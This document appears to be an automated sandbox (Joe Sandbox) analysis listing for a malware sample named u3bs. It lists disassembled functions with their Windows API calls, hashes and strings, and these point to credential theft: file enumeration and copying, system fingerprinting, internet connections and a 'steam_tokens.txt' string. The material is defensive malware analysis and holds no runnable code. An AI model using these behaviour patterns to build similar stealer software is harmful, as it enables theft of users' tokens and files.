Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID:
String ID: Pi@
API String ID: 0-1360946908
Opcode ID: 8cfa37973c56b3597612bf0eabde1d0c10c792fef38bbd1cab651f123bbbde38
Instruction ID: 3e1b1374d11ee30af11b8018be346ecc1401931fa3badc01db0dac5c56ce0c6a
Opcode Fuzzy Hash: 8cfa37973c56b3597612bf0eabde1d0c10c792fef38bbd1cab651f123bbbde38
Instruction Fuzzy Hash: 756105B5D00208DBDB14DF94D984BEEB7B0AB48304F1185AAE80677380D739AEA5DF95

Uniqueness

Uniqueness Score: -1.00%

Function 00404470 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60stringnetworkCOMMON

Download Yara Rule

APIs

Part of subcall function 00414FF0: malloc.MSVCRT ref: 00414FF8

lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

Strings

<, xrefs: 00404489

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlenmalloc
String ID: <
API String ID: 3848002758-4251816714
Opcode ID: 37ed0ca631367af82f36f63dd07d4b086523e6c9a941f75142a47ca63166a19e
Instruction ID: 4ed07355fbd84ea2b0e25782c0c6f45789bb77a73037a8222357df496ca5bcbd
Opcode Fuzzy Hash: 37ed0ca631367af82f36f63dd07d4b086523e6c9a941f75142a47ca63166a19e
Instruction Fuzzy Hash: 52216DB1D00208ABDF10EFA5E845BDD7B74AB44324F008229FA25B72C0EB346A46CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040EF80 Relevance: 4.7, APIs: 3, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,043306C0), ref: 0040EFCE
StrCmpCA.SHLWAPI(00000000,04330530), ref: 0040F06F
StrCmpCA.SHLWAPI(00000000,04330520), ref: 0040F17E

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 31078a274c7ecb916f7a8f6683db220afe1a3ed558bf997ca1166e5725c4bf32
Instruction ID: 4355cab003f180362ea4467312be264c8b2230b95154913c46dc9b5fce20c885
Opcode Fuzzy Hash: 31078a274c7ecb916f7a8f6683db220afe1a3ed558bf997ca1166e5725c4bf32
Instruction Fuzzy Hash: 8D719871B002099BCF08FF75D9929EEB77AAF94304B10852EF4099B285EA34DE45CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0040EF9F Relevance: 4.7, APIs: 3, Instructions: 177COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,043306C0), ref: 0040EFCE
StrCmpCA.SHLWAPI(00000000,04330530), ref: 0040F06F
StrCmpCA.SHLWAPI(00000000,04330520), ref: 0040F17E

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 572c9ad16ab8822ac46bcb40876d0a65d15739239fcb8d820afb305b4ebff93d
Instruction ID: f0c51ec5e8e6f52f2f367cc82315d09f99f950b48122d5325302ee48485a66a2
Opcode Fuzzy Hash: 572c9ad16ab8822ac46bcb40876d0a65d15739239fcb8d820afb305b4ebff93d
Instruction Fuzzy Hash: 03618A71B002099FCF08EF75D9929EEB77AAF94304B10852EF4099B295DA34EE45CBC4

Uniqueness

Uniqueness Score: -1.00%

Function 004127E0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 0041281A
lstrcat.KERNEL32(?,04337050), ref: 00412838

Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
Part of subcall function 00412570: FindFirstFileA.KERNEL32(?,?), ref: 004125A0

Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
Part of subcall function 00412570: FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
Part of subcall function 00412570: FindClose.KERNEL32(000000FF), ref: 004127CE

Part of subcall function 00412570: wsprintfA.USER32 ref: 0041260A
Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D4B2), ref: 0041261C
Part of subcall function 00412570: wsprintfA.USER32 ref: 00412639
Part of subcall function 00412570: PathMatchSpecA.SHLWAPI(?,?), ref: 0041266F
Part of subcall function 00412570: lstrcat.KERNEL32(?,04330840), ref: 0041269B
Part of subcall function 00412570: lstrcat.KERNEL32(?,0041D880), ref: 004126AD
Part of subcall function 00412570: lstrcat.KERNEL32(?,?), ref: 004126BE
Part of subcall function 00412570: lstrcat.KERNEL32(?,0041D884), ref: 004126D0
Part of subcall function 00412570: lstrcat.KERNEL32(?,?), ref: 004126E4
Part of subcall function 00412570: CopyFileA.KERNEL32(?,?,00000001), ref: 004126FA
Part of subcall function 00412570: DeleteFileA.KERNEL32(?), ref: 00412779

Part of subcall function 00412570: wsprintfA.USER32 ref: 0041265B

Strings

00A, xrefs: 0041285C, 0041288B, 004128BB, 004128EA, 0041291A, 00412949, 0041296B, 0041285F, 0041288E, 004128BE, 004128ED, 0041291D, 0041294C

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: 00A
API String ID: 2104210347-95910775
Opcode ID: c2aab32bc768535aa461f5625e9143b12642d6fe0ed55be40c744e8f67642cc8
Instruction ID: 9a839e9be304faf39bc4facc08b08f26c4420ed68fa3aa933a56f5c5bfc0aac5
Opcode Fuzzy Hash: c2aab32bc768535aa461f5625e9143b12642d6fe0ed55be40c744e8f67642cc8
Instruction Fuzzy Hash: 6441ABB7A001047BCB24FBE0DC92EEA377E9B94705F00424DB55987191ED74A7D48BD9

Uniqueness

Uniqueness Score: -1.00%

Function 6B073060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON

Download Yara Rule

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6B073095

Part of subcall function 6B0735A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6B0FF688,00001000), ref: 6B0735D5
Part of subcall function 6B0735A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6B0735E0
Part of subcall function 6B0735A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6B0735FD
Part of subcall function 6B0735A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6B07363F
Part of subcall function 6B0735A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6B07369F
Part of subcall function 6B0735A0: __aulldiv.LIBCMT ref: 6B0736E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6B07309F

Part of subcall function 6B095B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6B0956EE,?,00000001), ref: 6B095B85
Part of subcall function 6B095B50: EnterCriticalSection.KERNEL32(6B0FF688,?,?,?,6B0956EE,?,00000001), ref: 6B095B90
Part of subcall function 6B095B50: LeaveCriticalSection.KERNEL32(6B0FF688,?,?,?,6B0956EE,?,00000001), ref: 6B095BD8
Part of subcall function 6B095B50: GetTickCount64.KERNEL32 ref: 6B095BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6B0730BE

Part of subcall function 6B0730F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6B073127
Part of subcall function 6B0730F0: __aulldiv.LIBCMT ref: 6B073140

Part of subcall function 6B0AAB2A: __onexit.LIBCMT ref: 6B0AAB30

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: 83eff77de84138ae98fd8d093eae53c16616053155ab01ad62200b34594ec208
Instruction ID: d9457ad3a7009fcc1309fe843cea7b45ec6125952af33c83733dd7c1acbf35a9
Opcode Fuzzy Hash: 83eff77de84138ae98fd8d093eae53c16616053155ab01ad62200b34594ec208
Instruction Fuzzy Hash: 32F0F932D217489ACA24EFB4A8423A6BF6CAF6B114F505729EC4457151FF20E1D4C386

Uniqueness

Uniqueness Score: -1.00%

Function 00415B70 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
CloseHandle.KERNEL32(00000000), ref: 00415BAF

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 97fc9d568dab5260ce1fa1a51ba1ebaf2853d767a04b83f08cd6b5726440208b
Instruction ID: b12b055c0fde6327b7bfc42128d307bcca402a5100f46dd347d8d84938e244fe
Opcode Fuzzy Hash: 97fc9d568dab5260ce1fa1a51ba1ebaf2853d767a04b83f08cd6b5726440208b
Instruction Fuzzy Hash: C5F05475A0010CFBDB14DFA4DC4AFED7778BB08300F004499BA0597280D6B06E85CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00414400 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
HeapAlloc.KERNEL32(00000000), ref: 00414414
GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
Instruction ID: 2ac30a00ccf60c4f43266989ac8565747831d88261cb92d9c694311de33eed43
Opcode Fuzzy Hash: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
Instruction Fuzzy Hash: F1E0D8B0A00608FBCB20DFE4DD48BDD77BCAB04305F100055FA05D3240D7749A458B96

Uniqueness

Uniqueness Score: -1.00%

Function 004010D0 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
ExitProcess.KERNEL32 ref: 00401103

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
Instruction ID: b86936f0f7b92ad6105a5e8d9325c57b614f4cde8fc05540e07f2d0ff83aec39
Opcode Fuzzy Hash: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
Instruction Fuzzy Hash: 1BE0867098570CBBE7309BA0DD0AB1976689B08B06F101055F7097A1D0C6B425008699

Uniqueness

Uniqueness Score: -1.00%

Function 004119B0 Relevance: 3.1, APIs: 2, Instructions: 66stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 004119C8

Part of subcall function 00411650: wsprintfA.USER32 ref: 00411669
Part of subcall function 00411650: FindFirstFileA.KERNEL32(?,?), ref: 00411680

strtok_s.MSVCRT ref: 00411A4D

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: strtok_s$FileFindFirstwsprintf
String ID:
API String ID: 3409980764-0
Opcode ID: 975833a798ef07385fb740c26f6e35f7306421425023d288693ea324a83a39c3
Instruction ID: 5fc3070f54b5ba386e916c7c3ae22cc6ad81f817c7a7f871d2ab45b9afc63085
Opcode Fuzzy Hash: 975833a798ef07385fb740c26f6e35f7306421425023d288693ea324a83a39c3
Instruction Fuzzy Hash: 19215471900108EBCB14FFA5CC55FED7B79AF44345F10805AF51A97151EB386B84CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00412B30 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0432E458,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

lstrlen.KERNEL32(00000000,00000000,0041D599,?,?,?,?,?,?,00412FF8,?), ref: 00412B5A

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04330750), ref: 00404ED9

Strings

steam_tokens.txt, xrefs: 00412B6F

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy$InternetOpen
String ID: steam_tokens.txt
API String ID: 2934705399-401951677
Opcode ID: 146202038c27c066fd367394517b8ff31af65033eaae5766017a7843a854a70d
Instruction ID: 10dd2298c38adeb5e36390c5bfe4eda46295fd03d88468a146a299c80adb3810
Opcode Fuzzy Hash: 146202038c27c066fd367394517b8ff31af65033eaae5766017a7843a854a70d
Instruction Fuzzy Hash: 18F08175D1020866CB18FBB2EC539ED773D9E54348B00425EF81662491EF38A788C6E9

Uniqueness

Uniqueness Score: -1.00%

Function 004147C0 Relevance: 3.0, APIs: 2, Instructions: 17COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00000000), ref: 004147CD
wsprintfA.USER32 ref: 004147E3

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: ae5762f0629c30c52eb39fe9d29b6f6254fbc8fd6ef0ba27fd947bac7523c98c
Instruction ID: d87a4f6b3ea3f44bdf221dc5e2fa01f01132d118a4d77551e5f155a4815ada85
Opcode Fuzzy Hash: ae5762f0629c30c52eb39fe9d29b6f6254fbc8fd6ef0ba27fd947bac7523c98c
Instruction Fuzzy Hash: FAD012B580020C5BD720DBD0ED49AE9B77DBB44204F4049A5EE1492140EBB96AD58AA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACE0 Relevance: 2.9, APIs: 2, Instructions: 387stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrlen.KERNEL32(00000000), ref: 0040B190
lstrlen.KERNEL32(00000000), ref: 0040B1A4

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04330750), ref: 00404ED9

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocInternetLocalOpenmemcmpmemset
String ID:
API String ID: 574041509-0
Opcode ID: 13cddce308538c06651fb638f78a22c734a645341f8300229f816ad67d3302cc
Instruction ID: df99340f366afcb3d937a345db0e295b6fae9bf0b5ece921659d29683b3ff0c0
Opcode Fuzzy Hash: 13cddce308538c06651fb638f78a22c734a645341f8300229f816ad67d3302cc
Instruction Fuzzy Hash: 6CE114769101189BCF15EBA1DC92EEE773DBF54308F41415EF10676091EF38AA89CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A6E0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

lstrlen.KERNEL32(00000000), ref: 0040A95A
lstrlen.KERNEL32(00000000), ref: 0040A96E

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04330750), ref: 00404ED9

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
String ID:
API String ID: 3635112192-0
Opcode ID: 81f89f89a699842849bbc34ae32ea460001fcc8d8fac6b9a64a259e6930afa28
Instruction ID: 9f23dc4c71334aa449457ef7a0e8bbad4682aa92b3b7ddf60c673b4dae8ee631
Opcode Fuzzy Hash: 81f89f89a699842849bbc34ae32ea460001fcc8d8fac6b9a64a259e6930afa28
Instruction Fuzzy Hash: FC9149729102049BCF14FBA1DC51EEE773DBF54308F41425EF50666091EF38AA89CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040AA20 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

lstrlen.KERNEL32(00000000), ref: 0040AC1E
lstrlen.KERNEL32(00000000), ref: 0040AC32

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04330750), ref: 00404ED9

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
String ID:
API String ID: 3635112192-0
Opcode ID: 934ca093238930b0b8223b75aa6300b7685426ca81bacad379603acf2cb6e169
Instruction ID: 57c8c1270dba92ae3db9aa8e51dd660502e79bf125d10b7c0566732e7217b02b
Opcode Fuzzy Hash: 934ca093238930b0b8223b75aa6300b7685426ca81bacad379603acf2cb6e169
Instruction Fuzzy Hash: C07153759102049BCF14FBA1DC52DEE7739BF54308F41422EF506A7191EF38AA89CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004114C0 Relevance: 2.6, APIs: 2, Instructions: 100COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00411550

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

